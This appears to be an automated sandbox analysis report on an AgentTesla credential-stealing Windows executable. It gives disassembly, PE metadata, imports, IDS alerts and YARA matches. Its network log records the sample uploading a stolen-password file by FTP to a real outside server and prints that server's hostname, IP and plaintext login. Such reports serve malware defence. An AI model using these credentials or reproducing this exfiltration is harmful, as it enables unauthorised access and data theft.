jmp 00007F67652C52ECh
cmp ecx, 00000080h
jc 00007F67652C51A4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F67652C4FE0h
bt dword ptr [004BF324h], 01h
jc 00007F67652C54B0h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F67652C517Dh
test edi, 00000003h
jne 00007F67652C518Eh
test esi, 00000003h
jne 00007F67652C516Dh
bt edi, 02h
jnc 00007F67652C4FDFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F67652C4FE3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F67652C5035h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x34670	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfd000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x34670	0x34800	775026585519ca34825c41a8804a35f6	False	0.8737165178571429	data	7.761448851849117	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfd000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x2b908	data			1.0003418516027796
RT_GROUP_ICON	0xfc0c0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xfc138	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xfc14c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xfc160	0x14	data	English	Great Britain	1.25
RT_VERSION	0xfc174	0x10c	data	English	Great Britain	0.5970149253731343
RT_MANIFEST	0xfc280	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/24/24-11:18:15.551341	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49731	47566	192.168.2.4	201.148.105.186
05/24/24-11:18:14.933252	TCP	2029927	ET TROJAN AgentTesla Exfil via FTP	49730	21	192.168.2.4	201.148.105.186
05/24/24-11:18:15.551341	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49731	47566	192.168.2.4	201.148.105.186

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 24, 2024 11:18:12.791018009 CEST	49730	21	192.168.2.4	201.148.105.186
May 24, 2024 11:18:12.796294928 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:12.796406031 CEST	49730	21	192.168.2.4	201.148.105.186
May 24, 2024 11:18:13.420198917 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:13.420727015 CEST	49730	21	192.168.2.4	201.148.105.186
May 24, 2024 11:18:13.425828934 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:13.643019915 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:13.645137072 CEST	49730	21	192.168.2.4	201.148.105.186
May 24, 2024 11:18:13.650100946 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:14.011776924 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:14.012034893 CEST	49730	21	192.168.2.4	201.148.105.186
May 24, 2024 11:18:14.017210960 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:14.234715939 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:14.235887051 CEST	49730	21	192.168.2.4	201.148.105.186
May 24, 2024 11:18:14.240859985 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:14.460078001 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:14.467338085 CEST	49730	21	192.168.2.4	201.148.105.186
May 24, 2024 11:18:14.472254038 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:14.694156885 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:14.694459915 CEST	49730	21	192.168.2.4	201.148.105.186
May 24, 2024 11:18:14.699330091 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:14.927403927 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:14.928055048 CEST	49731	47566	192.168.2.4	201.148.105.186
May 24, 2024 11:18:14.933012962 CEST	47566	49731	201.148.105.186	192.168.2.4
May 24, 2024 11:18:14.933100939 CEST	49731	47566	192.168.2.4	201.148.105.186
May 24, 2024 11:18:14.933252096 CEST	49730	21	192.168.2.4	201.148.105.186
May 24, 2024 11:18:14.984253883 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:15.551079988 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:15.551341057 CEST	49731	47566	192.168.2.4	201.148.105.186
May 24, 2024 11:18:15.551428080 CEST	49731	47566	192.168.2.4	201.148.105.186
May 24, 2024 11:18:15.556368113 CEST	47566	49731	201.148.105.186	192.168.2.4
May 24, 2024 11:18:15.561672926 CEST	47566	49731	201.148.105.186	192.168.2.4
May 24, 2024 11:18:15.561748028 CEST	49731	47566	192.168.2.4	201.148.105.186
May 24, 2024 11:18:15.597860098 CEST	49730	21	192.168.2.4	201.148.105.186
May 24, 2024 11:18:15.778122902 CEST	21	49730	201.148.105.186	192.168.2.4
May 24, 2024 11:18:15.832304955 CEST	49730	21	192.168.2.4	201.148.105.186

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 24, 2024 11:18:12.413028955 CEST	52147	53	192.168.2.4	1.1.1.1
May 24, 2024 11:18:12.786117077 CEST	53	52147	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 24, 2024 11:18:12.413028955 CEST	192.168.2.4	1.1.1.1	0x7a3b	Standard query (0)	ftp.transotraval.cl	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 24, 2024 11:18:12.786117077 CEST	1.1.1.1	192.168.2.4	0x7a3b	No error (0)	ftp.transotraval.cl		201.148.105.186	A (IP address)	IN (0x0001)	false

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
May 24, 2024 11:18:13.420198917 CEST	21	49730	201.148.105.186	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 05:18. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
May 24, 2024 11:18:13.420727015 CEST	49730	21	192.168.2.4	201.148.105.186	USER ugoomabless@transotraval.cl
May 24, 2024 11:18:13.643019915 CEST	21	49730	201.148.105.186	192.168.2.4	331 User ugoomabless@transotraval.cl OK. Password required
May 24, 2024 11:18:13.645137072 CEST	49730	21	192.168.2.4	201.148.105.186	PASS 4)7@D4,-Q%Xj
May 24, 2024 11:18:14.011776924 CEST	21	49730	201.148.105.186	192.168.2.4	230 OK. Current restricted directory is /
May 24, 2024 11:18:14.234715939 CEST	21	49730	201.148.105.186	192.168.2.4	504 Unknown command
May 24, 2024 11:18:14.235887051 CEST	49730	21	192.168.2.4	201.148.105.186	PWD
May 24, 2024 11:18:14.460078001 CEST	21	49730	201.148.105.186	192.168.2.4	257 "/" is your current location
May 24, 2024 11:18:14.467338085 CEST	49730	21	192.168.2.4	201.148.105.186	TYPE I
May 24, 2024 11:18:14.694156885 CEST	21	49730	201.148.105.186	192.168.2.4	200 TYPE is now 8-bit binary
May 24, 2024 11:18:14.694459915 CEST	49730	21	192.168.2.4	201.148.105.186	PASV
May 24, 2024 11:18:14.927403927 CEST	21	49730	201.148.105.186	192.168.2.4	227 Entering Passive Mode (201,148,105,186,185,206)
May 24, 2024 11:18:14.933252096 CEST	49730	21	192.168.2.4	201.148.105.186	STOR PW_user-887849_2024_05_24_05_18_11.html
May 24, 2024 11:18:15.551079988 CEST	21	49730	201.148.105.186	192.168.2.4	150 Accepted data connection
May 24, 2024 11:18:15.778122902 CEST	21	49730	201.148.105.186	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.227 seconds (measured here), 1.37 Kbytes per second

Target ID:	0
Start time:	05:18:08
Start date:	24/05/2024
Path:	C:\Users\user\Desktop\7F7R8soxHM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\7F7R8soxHM.exe"
Imagebase:	0xe70000
File size:	1'043'968 bytes
MD5 hash:	8F537E91245BCC1510A9867CB88B12EA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:18:09
Start date:	24/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\7F7R8soxHM.exe"
Imagebase:	0x7a0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2883490395.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2883490395.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	5.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	154

Executed Functions

Function 00E73B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E73B7A
IsDebuggerPresent.KERNEL32 ref: 00E73B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,00F362F8,00F362E0,?,?), ref: 00E73BFD

Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66

Part of subcall function 00E80A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E73C26,00F362F8,?,?,?), ref: 00E80ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00E73C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F293F0,00000010), ref: 00EAD4BC
SetCurrentDirectoryW.KERNEL32(?,00F362F8,?,?,?), ref: 00EAD4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F25D40,00F362F8,?,?,?), ref: 00EAD57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00EAD581

Part of subcall function 00E73A58: GetSysColorBrush.USER32(0000000F), ref: 00E73A62
Part of subcall function 00E73A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E73A71
Part of subcall function 00E73A58: LoadIconW.USER32(00000063), ref: 00E73A88
Part of subcall function 00E73A58: LoadIconW.USER32(000000A4), ref: 00E73A9A
Part of subcall function 00E73A58: LoadIconW.USER32(000000A2), ref: 00E73AAC
Part of subcall function 00E73A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E73AD2
Part of subcall function 00E73A58: RegisterClassExW.USER32(?), ref: 00E73B28

Part of subcall function 00E739E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E73A15
Part of subcall function 00E739E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E73A36
Part of subcall function 00E739E7: ShowWindow.USER32(00000000,?,?), ref: 00E73A4A
Part of subcall function 00E739E7: ShowWindow.USER32(00000000,?,?), ref: 00E73A53

Part of subcall function 00E743DB: _memset.LIBCMT ref: 00E74401
Part of subcall function 00E743DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E744A6

Strings

This is a third-party compiled AutoIt script., xrefs: 00EAD4B4
runas, xrefs: 00EAD575

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

